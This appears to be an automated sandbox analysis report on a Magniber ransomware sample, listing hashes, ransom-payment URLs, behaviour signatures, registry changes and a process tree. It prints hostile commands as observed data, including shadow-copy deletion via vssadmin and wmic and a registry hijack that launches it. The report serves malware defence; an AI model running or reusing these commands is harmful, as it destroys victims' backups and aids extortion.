Analysis
-
max time kernel
104s -
max time network
106s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
18-08-2021 21:21
Static task
static1
Behavioral task
behavioral1
Sample
7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe
Resource
win11
Behavioral task
behavioral3
Sample
7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe
Resource
win10v20210408
General
-
Target
7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe
-
Size
22KB
-
MD5
c6b6ec00b64069d66c8d14d65f7cfd8f
-
SHA1
b90e6bf12728fa3b0984aabc32b39f1db082a1da
-
SHA256
7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed
-
SHA512
c9d7c97c63806e87804c33530f48ba950542ba28421d354cb287c9bf027ff5a853b76200e87eadd3cde0469f4b8c93f8c4bc0e71f5e4aa1cdf33e05c0673254a
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://76240cb06414c040c2csnwyqmwa.erpp3f6j634gmj33.onion/csnwyqmwa
http://76240cb06414c040c2csnwyqmwa.jobsbig.cam/csnwyqmwa
http://76240cb06414c040c2csnwyqmwa.nowuser.casa/csnwyqmwa
http://76240cb06414c040c2csnwyqmwa.boxgas.icu/csnwyqmwa
http://76240cb06414c040c2csnwyqmwa.bykeep.club/csnwyqmwa
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 10 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1680 648 cmd.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1536 648 cmd.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1724 648 cmd.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1080 648 cmd.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1528 648 cmd.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2632 648 vssadmin.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2696 648 vssadmin.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2716 648 vssadmin.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2736 648 vssadmin.exe 48 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3016 648 vssadmin.exe 48 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\PushDebug.tif => C:\Users\Admin\Pictures\PushDebug.tif.csnwyqmwa taskhost.exe File renamed C:\Users\Admin\Pictures\RepairProtect.png => C:\Users\Admin\Pictures\RepairProtect.png.csnwyqmwa taskhost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1064 set thread context of 1128 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 16 PID 1064 set thread context of 1180 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 15 PID 1064 set thread context of 1244 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 14 PID 1064 set thread context of 0 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2716 vssadmin.exe 2736 vssadmin.exe 3016 vssadmin.exe 2632 vssadmin.exe 2696 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30547cab7794d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a003c3af57a3d041856ddeca2f96779f00000000020000000000106600000001000020000000c98fa0ccaa652819d6e6f53184910d713384da1f4a8a3043d75674f6eb4f91af000000000e8000000002000020000000559d902896cfbea252dfbb2c418cea4c26de0e6df55f74a16b38176633ad7e0920000000b248677eb07083302672282617ef8a3724aecdacdf06187a08700092090e9e4d4000000090609d5ee5a3fa5d3bf998472d40b9949c97e3e29bebca30f2754c1b7ae089bc87d12ee9274e7d13798ec57288e79e613dc2c53ed955fe446f4f9f68a65b7738 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "336086911" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D278DD81-006A-11EC-9117-4E8833708825} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a003c3af57a3d041856ddeca2f96779f00000000020000000000106600000001000020000000c41f9cedcbcbf90a34604e562db38eee08fee97956cdc001e35ac8b5dfaa8afa000000000e80000000020000200000007368d9945fc672e0dc5c500157aa67ce9280298a26775fbee1af40f841643a4d90000000729596bd601ccfb3fc0b595b499bc98fdf58efb93dd97fbf2bb35784f343626ff83008977c96ffb041751e35c967e353f28bd73b4e8587f66e318ca6f3f3e44c119dc1da28ff12b6596284728581ac1ade98916729a34e60df5577ffda0e96d60f30496f60f88373b76ad64c1182842b5397349bacd9964a3aa9e043642f90acbf2837dae18e9fcc4d40d59f426dbb0d40000000af78390080332f92670de70d5d3b6e6e74b0976ac7a38078d1c852363df956685839615fa191d01703bf6540e4b4169acb94fd44ddeefbfe63c514ccbd27d0a2 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command Explorer.EXE -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1740 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1244 Explorer.EXE Token: SeShutdownPrivilege 1244 Explorer.EXE Token: SeShutdownPrivilege 1244 Explorer.EXE Token: SeShutdownPrivilege 1244 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1424 WMIC.exe Token: SeSecurityPrivilege 1424 WMIC.exe Token: SeTakeOwnershipPrivilege 1424 WMIC.exe Token: SeLoadDriverPrivilege 1424 WMIC.exe Token: SeSystemProfilePrivilege 1424 WMIC.exe Token: SeSystemtimePrivilege 1424 WMIC.exe Token: SeProfSingleProcessPrivilege 1424 WMIC.exe Token: SeIncBasePriorityPrivilege 1424 WMIC.exe Token: SeCreatePagefilePrivilege 1424 WMIC.exe Token: SeBackupPrivilege 1424 WMIC.exe Token: SeRestorePrivilege 1424 WMIC.exe Token: SeShutdownPrivilege 1424 WMIC.exe Token: SeDebugPrivilege 1424 WMIC.exe Token: SeSystemEnvironmentPrivilege 1424 WMIC.exe Token: SeRemoteShutdownPrivilege 1424 WMIC.exe Token: SeUndockPrivilege 1424 WMIC.exe Token: SeManageVolumePrivilege 1424 WMIC.exe Token: 33 1424 WMIC.exe Token: 34 1424 WMIC.exe Token: 35 1424 WMIC.exe Token: SeIncreaseQuotaPrivilege 1164 WMIC.exe Token: SeSecurityPrivilege 1164 WMIC.exe Token: SeTakeOwnershipPrivilege 1164 WMIC.exe Token: SeLoadDriverPrivilege 1164 WMIC.exe Token: SeSystemProfilePrivilege 1164 WMIC.exe Token: SeSystemtimePrivilege 1164 WMIC.exe Token: SeProfSingleProcessPrivilege 1164 WMIC.exe Token: SeIncBasePriorityPrivilege 1164 WMIC.exe Token: SeCreatePagefilePrivilege 1164 WMIC.exe Token: SeBackupPrivilege 1164 WMIC.exe Token: SeRestorePrivilege 1164 WMIC.exe Token: SeShutdownPrivilege 1164 WMIC.exe Token: SeDebugPrivilege 1164 WMIC.exe Token: SeSystemEnvironmentPrivilege 1164 WMIC.exe Token: SeRemoteShutdownPrivilege 1164 WMIC.exe Token: SeUndockPrivilege 1164 WMIC.exe Token: SeManageVolumePrivilege 1164 WMIC.exe Token: 33 1164 WMIC.exe Token: 34 1164 WMIC.exe Token: 35 1164 WMIC.exe Token: SeIncreaseQuotaPrivilege 1004 WMIC.exe Token: SeSecurityPrivilege 1004 WMIC.exe Token: SeTakeOwnershipPrivilege 1004 WMIC.exe Token: SeLoadDriverPrivilege 1004 WMIC.exe Token: SeSystemProfilePrivilege 1004 WMIC.exe Token: SeSystemtimePrivilege 1004 WMIC.exe Token: SeProfSingleProcessPrivilege 1004 WMIC.exe Token: SeIncBasePriorityPrivilege 1004 WMIC.exe Token: SeCreatePagefilePrivilege 1004 WMIC.exe Token: SeBackupPrivilege 1004 WMIC.exe Token: SeRestorePrivilege 1004 WMIC.exe Token: SeShutdownPrivilege 1004 WMIC.exe Token: SeDebugPrivilege 1004 WMIC.exe Token: SeSystemEnvironmentPrivilege 1004 WMIC.exe Token: SeRemoteShutdownPrivilege 1004 WMIC.exe Token: SeUndockPrivilege 1004 WMIC.exe Token: SeManageVolumePrivilege 1004 WMIC.exe Token: 33 1004 WMIC.exe Token: 34 1004 WMIC.exe Token: 35 1004 WMIC.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1244 Explorer.EXE 1500 iexplore.exe 1244 Explorer.EXE 1244 Explorer.EXE 1244 Explorer.EXE 1244 Explorer.EXE -
Suspicious use of SendNotifyMessage 8 IoCs
pid Process 1244 Explorer.EXE 1244 Explorer.EXE 1244 Explorer.EXE 1244 Explorer.EXE 1244 Explorer.EXE 1244 Explorer.EXE 1244 Explorer.EXE 1244 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1500 iexplore.exe 1500 iexplore.exe 1376 IEXPLORE.EXE 1376 IEXPLORE.EXE 1376 IEXPLORE.EXE 1376 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1128 wrote to memory of 1740 1128 taskhost.exe 26 PID 1128 wrote to memory of 1740 1128 taskhost.exe 26 PID 1128 wrote to memory of 1740 1128 taskhost.exe 26 PID 1128 wrote to memory of 1716 1128 taskhost.exe 31 PID 1128 wrote to memory of 1716 1128 taskhost.exe 31 PID 1128 wrote to memory of 1716 1128 taskhost.exe 31 PID 1128 wrote to memory of 1320 1128 taskhost.exe 30 PID 1128 wrote to memory of 1320 1128 taskhost.exe 30 PID 1128 wrote to memory of 1320 1128 taskhost.exe 30 PID 1180 wrote to memory of 1732 1180 Dwm.exe 33 PID 1180 wrote to memory of 1732 1180 Dwm.exe 33 PID 1180 wrote to memory of 1732 1180 Dwm.exe 33 PID 1320 wrote to memory of 1004 1320 cmd.exe 34 PID 1320 wrote to memory of 1004 1320 cmd.exe 34 PID 1320 wrote to memory of 1004 1320 cmd.exe 34 PID 1732 wrote to memory of 1424 1732 cmd.exe 35 PID 1732 wrote to memory of 1424 1732 cmd.exe 35 PID 1732 wrote to memory of 1424 1732 cmd.exe 35 PID 1244 wrote to memory of 972 1244 Explorer.EXE 36 PID 1244 wrote to memory of 972 1244 Explorer.EXE 36 PID 1244 wrote to memory of 972 1244 Explorer.EXE 36 PID 1716 wrote to memory of 1500 1716 cmd.exe 37 PID 1716 wrote to memory of 1500 1716 cmd.exe 37 PID 1716 wrote to memory of 1500 1716 cmd.exe 37 PID 972 wrote to memory of 1164 972 cmd.exe 38 PID 972 wrote to memory of 1164 972 cmd.exe 38 PID 972 wrote to memory of 1164 972 cmd.exe 38 PID 1064 wrote to memory of 860 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 40 PID 1064 wrote to memory of 860 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 40 PID 1064 wrote to memory of 860 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 40 PID 860 wrote to memory of 620 860 cmd.exe 42 PID 860 wrote to memory of 620 860 cmd.exe 42 PID 860 wrote to memory of 620 860 cmd.exe 42 PID 1064 wrote to memory of 532 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 43 PID 1064 wrote to memory of 532 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 43 PID 1064 wrote to memory of 532 1064 7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe 43 PID 532 wrote to memory of 1552 532 cmd.exe 45 PID 532 wrote to memory of 1552 532 cmd.exe 45 PID 532 wrote to memory of 1552 532 cmd.exe 45 PID 1500 wrote to memory of 1376 1500 iexplore.exe 50 PID 1500 wrote to memory of 1376 1500 iexplore.exe 50 PID 1500 wrote to memory of 1376 1500 iexplore.exe 50 PID 1500 wrote to memory of 1376 1500 iexplore.exe 50 PID 1724 wrote to memory of 2212 1724 cmd.exe 63 PID 1080 wrote to memory of 2220 1080 cmd.exe 62 PID 1724 wrote to memory of 2212 1724 cmd.exe 63 PID 1080 wrote to memory of 2220 1080 cmd.exe 62 PID 1724 wrote to memory of 2212 1724 cmd.exe 63 PID 1080 wrote to memory of 2220 1080 cmd.exe 62 PID 1528 wrote to memory of 2240 1528 cmd.exe 64 PID 1528 wrote to memory of 2240 1528 cmd.exe 64 PID 1528 wrote to memory of 2240 1528 cmd.exe 64 PID 1536 wrote to memory of 2268 1536 cmd.exe 65 PID 1536 wrote to memory of 2268 1536 cmd.exe 65 PID 1536 wrote to memory of 2268 1536 cmd.exe 65 PID 2220 wrote to memory of 2444 2220 CompMgmtLauncher.exe 67 PID 2220 wrote to memory of 2444 2220 CompMgmtLauncher.exe 67 PID 2220 wrote to memory of 2444 2220 CompMgmtLauncher.exe 67 PID 2256 wrote to memory of 2460 2256 CompMgmtLauncher.exe 69 PID 2256 wrote to memory of 2460 2256 CompMgmtLauncher.exe 69 PID 2256 wrote to memory of 2460 2256 CompMgmtLauncher.exe 69 PID 2240 wrote to memory of 2484 2240 CompMgmtLauncher.exe 70 PID 2240 wrote to memory of 2484 2240 CompMgmtLauncher.exe 70 PID 2240 wrote to memory of 2484 2240 CompMgmtLauncher.exe 70
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Users\Admin\AppData\Local\Temp\7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe"C:\Users\Admin\AppData\Local\Temp\7ec95111e00ce9c19ebf88e9683363390873451b00e0348bca4d80ef1e4b20ed.exe"2⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:620
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:1552
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:972 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1740
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
-
C:\Windows\system32\cmd.execmd /c "start http://76240cb06414c040c2csnwyqmwa.jobsbig.cam/csnwyqmwa^&1^&50256948^&77^&339^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://76240cb06414c040c2csnwyqmwa.jobsbig.cam/csnwyqmwa&1&50256948&77&339&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1500 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1376
-
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
PID:1680 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2460
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:2268
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2500
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:2212
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2776
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2444
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2484
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2632
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2696
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2716
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2736
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2868
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3016